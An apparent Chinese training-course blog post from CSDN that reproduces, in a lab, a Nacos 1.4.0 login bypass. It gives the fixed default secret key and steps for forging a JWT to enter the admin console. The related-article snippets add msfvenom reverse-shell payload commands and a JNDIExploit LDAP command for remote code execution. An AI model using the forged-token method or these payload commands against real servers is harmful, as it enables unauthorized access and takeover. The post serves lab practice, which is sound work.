在阿一网络安全培训学习的第20天!课后作业Burp靶场访问控制漏洞(1)

最新推荐文章于 2024-08-14 20:15:18 发布
最新推荐文章于 2024-08-14 20:15:18 发布
阅读量377 收藏 4
点赞数 5
分类专栏: 程序员 文章标签: web安全 学习 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84968812/article/details/138840094
版权

Nacos

该漏洞存在的原因是因为该版本nacos中,token.secret.key值是固定死的然后使用该默认key可以构造JWT

登陆时进行抓包,替换返回包中的token值

即使账号密码错误,也可登陆后台管理界面

详细原理

环境搭建

下载

配置

访问

docker pull nacos/nacos-server

docker run \

–name
nacos
-d
\

-p
8850
:8848 \

–privileged

true
\

–restart

always \

-e
JVM_XMS

256m \

-e
JVM_XMX

256m \

-e
MODE

standalone \

-e
PREFER_HOST_MODE

hostname \

nacos/nacos-server:1.4.0

访问

登录

初始账号密码都为
nacos

漏洞复现

获取默认token.secret.key

位于conf下的application.properties中

构造jwt

进入页面

SecretKey012345678901234567890123456789012345678901234567890123456789

时间获取

进行参数修改

使用生成token登录

进入页面

账号密码随意

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84968812
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
谓词归结逻辑第三版,彻底修改错误,此处特别鸣谢阿一同学的监工与验收
03-13
人工智能实验
南昌赣江新地项目品牌推广策略案_76PPT_九机构.pptx
10-13
阿一鲍鱼、芭蕉叶餐厅等知名品牌商家的入驻进一步增强了项目的人气。 然而,影响力并不等于品牌力。在产品同质化严重且易被复制的今,单靠影响力无法保证长期的成功。因此,九机构提出了"3力定市场"的观点,即...
阿一网络安全培训学习的第20课后作业Burp靶场访问控制漏洞
Ayixy的博客
04-25 204
位于conf下的application.properties中。值是固定死的然后使用该默认key可以构造JWT。登陆时进行抓包,替换返回包中的token值。该漏洞存在的原因是因为该版本nacos中,即使账号密码错误,也可登陆后台管理界面。将生成的身份令牌添加进去。
阿一网络安全培训学习的第20课后作业Burp靶场访问控制漏洞(2)
2401_84968882的博客
05-14 291
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
阿一网络安全培训学习第29课后作业之pikachu靶场
Ayixy的博客
04-29 138
然后发现一样只显示账号密码错误没显示验证码错误说明验证码可以使用。先打开靶场随机输入账号密码以及正确的验证码登录进行抓包。随后我们发到repeater模块更改验证码试试。最后爆破出账号为admin 密码为123456。爆破出账号密码为admin 123456。与上述操作一样随便输入账号密码进行抓包。我们验证码随便写的账号密码输入正确。依旧登录成功说明我们绕过成功。发送到repeater模块。并没有显示验证码输入错误。在burp上进行同样操作。说明成功绕过验证码严重。我们在进行账号密码爆破。
阿一网络安全培训学习的第20课后作业—sqli-labs靶场练习
Ayixy的博客
04-16 295
因此判断注入点再中Burp查看输入单引号,判断报错得知闭合为页面产生报错语句,因此直接进行报错查询查密码1个单引号报错两个单引号正常,由此判断闭合为该关卡注释符号被过滤了可以通过单引号闭合原语句的单引号,仍可进行查询输入得知查询字段数为,且回显字段数据输入1123得知查询字段数为,且回显字段数据输入11231。
阿一网络安全培训学习第55的一次真实环境下渗透的全过程
Ayixy的博客
05-20 885
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f。msfvenom -p osx/x86/shell_reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f macho >msfvenom -p java/jsp_shell_reverse_tcp LHOST=你的 IP LPORT=你监听的端口 -f raw >
阿一网络安全学院学员课后练习—xss靶场
Ayixy的博客
08-06 278
ng-include 指令就是文件包涵的意思,用来包涵外部的 html 文件,如果包涵的内容是地址,根据源码猜解传参的参数名,隐藏的 input 标签可以插入 type="text"显示、看了源代码后发现这里先是将字母小写化了,再把 script 替换成空格,最后将空格给实体化。href 属性自动解析 Unicode 编码。也没啥区别就是把 cookie 改了一下。是利用转跳到的网站以达到弹窗的效果。
阿一网络安全学院练习红日靶场之通过MSF和CS上线PC机器
Ayixy的博客
06-11 342
直接去目标机器执行了一下木马,是可以上线的,也许真实场景可以想办法的钓鱼让目标主动点击。若目标机器无法出网,就得让同处于内网的跳板机,采取正向或者反向连接的方式进行上线了。已知开放了这些端口,且我们拥有域控密码信息,尝试另外一种上线方式,让跳板机。可以直接在跳板机上新建监听,然后转发上线,但生成的木马免杀有点难操作。没有拿下,这台机器开了防火墙,直接通过。进行内网信息收集,得知域控机器。,并设置定时任务运行,从而上线。进程上,无法成功,遂找了个。,但这样操作的前提是建立在。通过之前抓取的密码,建立。
阿一网络安全培训第60——Apache Druid RCE漏洞复现及修复(CVE-2023-25194) ​​​​​​​
Ayixy的博客
05-24 694
2.使⽤ldap://vps ip:1389/Basic/Command/Base64/[base64_encoded_cmd]进⾏攻击。Kafka 是⼀个开源的分布式消息系统,Kafka 可以处理⼤量的消息和数据流,具有⾼吞吐量、低延迟、java -jar JNDIExploit-1.0-SNAPSHOT.jar:监听,可反弹shell。的特点,⼴泛应⽤于实时监控、事件驱动分析、⽤户⾏为分析、⽹络安全等领域。JNDI注⼊漏洞,可通过该漏洞在服务器端任意执⾏代码,写⼊后⻔,获取服务器权限,进⽽控制整个。
阿一网络安全培训中心带你回顾Windos/Linux 反弹 shell
qq_69775412的博客
06-05 880
最近都在打内网,就从最基础的知识开始学习、整理。
阿一鲍鱼-阿一鲍鱼1980.docx
11-25
阿一鲍鱼-阿一鲍鱼1980.docx
最新-英语国际音标表(48个)word版-绝对准确!-最新音标表.doc
10-06
【英语国际音标表详解】 英语国际音标是学习英语发音的重要工具,它为每个英语音素提供了标准化的表示方式,使得非母语者能够更...在学习过程中,可以结合单词和句子进行实践,以便更好地理解它们在实际语言中的应用。
网络安全入门教程(非常详细)从零基础入门到精通,看完这一篇就够了。
2401_84466359的博客
08-12 518
这个方向更符合于大部分人对“黑客”的认知,他们能够黑手机、黑电脑、黑网站、黑服务器、黑内网,万物皆可黑(当然是要有授权的,不然进橘子我可不管),这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。是一种面向对象、直译式电脑编程语言,具有近二十年的发展历史,成熟且稳定。压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。
ctf 堆栈结构
qq_69100706的博客
08-12 370
CTF(Capture The Flag)竞赛中,理解堆栈结构对于解决涉及二进制分析、逆向工程和利用开发的挑战至关重要。堆栈是在程序执行过程中用于临时存储数据和管理函数调用的关键数据结构。
DC-4靶机渗透测试
最新发布
weixin_58786230的博客
08-14 162
【代码】DC-4靶机渗透测试。
手把手教你CNVD漏洞挖掘 + 资产收集
2301_80127209的博客
08-12 662
挖掘CNVD漏洞有时候其实比一般的edusrc还好挖,但是一般要挖证书的话,还是需要花时间的,其中信息收集,公司资产确定等操作需要花费一定时间的。下面就记录下我之前跟一个师傅学习的一个垂直越权成功的CNVD漏洞通杀(仅作为思路分享)。
奥运会期间网络安全防护的重要性
gmqqcsdn的博客
08-12 497
它为运动员提供了公平竞争的舞台,为观众带来了精彩的观赛体验,也维护了奥运会的尊严和声誉。想象一下,如果奥运会的官方网站被黑客攻击,发布了虚假的赛事结果或负面信息,那将对奥运会的公信力造成极大的冲击。赛事的组织协调、运动员的信息管理、观众的票务与服务,无一不依赖于网络的稳定运行。通过强大的网络安全防护体系,能够及时检测和抵御这些威胁,保障网络的正常运行。北京时间凌晨3点,历史17的巴黎奥运会迎来落幕,在此先祝贺伟大的祖国获得了总奖牌榜第二,金牌榜并列第一的好成绩,对征战在奥运会赛场的运动健儿们致敬!
EditPlus高效配置与使用技巧分享
通过【Tools】菜单中的【INIFileDirectory】选项,用户可以选择一个合适的文件夹来存储配置信息,比如作者建议将它设在与绿色软件统一的目录下,以便于系统重装或更换电脑时快速恢复设置。 设置配置文件路径后,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值